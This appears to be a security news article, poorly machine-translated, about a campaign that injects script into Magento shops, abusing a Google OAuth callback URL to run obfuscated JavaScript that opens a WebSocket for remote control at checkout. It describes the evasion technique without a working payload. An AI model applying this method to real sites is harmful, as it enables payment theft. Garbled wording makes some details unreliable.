- The attackers use real Google URL to sneak malware beyond the antivirus and their browser without detecting
- This malware is only activated during payment, so it is a silent threat to online payments
- The script opens a websockt connection for live control, completely invisible to the average user
A new malware campaign has appeared based on the browser, demonstrating how the attackers are now exploiting trusted domains such as Google.com to avoid traditional antivirus defenses.
A report of security researchers in C/SIDE, this method is subtle, conditionally activated and is difficult for users and conventional security software.
It seems that it originates in a legitimate URL related to Oauth, but coversly execute a malicious payload with full access to the user’s browser session.
Malware hidden in sight
The attack begins with an integrated script in an electronic commerce site committed in Magento headquarters that refers to an apparently harmless Google Oouth login URL: https://accounts.google.com/oauth2/revoke.
However, this URL includes a manipulated call return parameter, which decodes and executes a defuscated Javascript payload using evaluation (atob (…)).
The use of Google’s domain is essential for deception, because the script is loaded with a reliable source, most content security policies (CSP) and DNS filters allow it undoubtedly.
This script is only activated in specific conditions. If the browser appears automated or the URL includes the word “payment”, silently opens a websockt connection to a malicious server. This means that you can adapt malicious behavior to user actions.
Any useful load sent through this channel is coded by Base64, decodes and runs dynamically using the JavaScript functions constructor.
The attacker can execute the code remotely in the browser in real time with this configuration.
One of the main factors that influence the effectiveness of this attack is its ability to evade many of the best antivirus programs currently in the market.
The logic of the script is very obfuscated and is only activated under certain conditions, so it is unlikely to be detected even by the best Android antivirus applications and scanners of static malware.
They will not inspect, mark or block useful JavaScript loads delivered through apparently legitimate Oauth flows.
DNS -based Firewall filters or rules also offer limited protection, since the initial application is Google’s legitimate domain.
In the business environment, even some of the best end -points protection tools may have difficulty detecting this activity if they depend largely on the reputation of the domain or do not inspect the dynamic script execution within the browsers.
Although advanced users and cybersecurity equipment can use content inspection or behavioral analysis tools to identify anomalies such as these, average users remain vulnerable.
Limit third -party scripts, the separation of browser sessions used for financial transactions and the watchman of unexpected site behaviors could help reduce short -term risk.
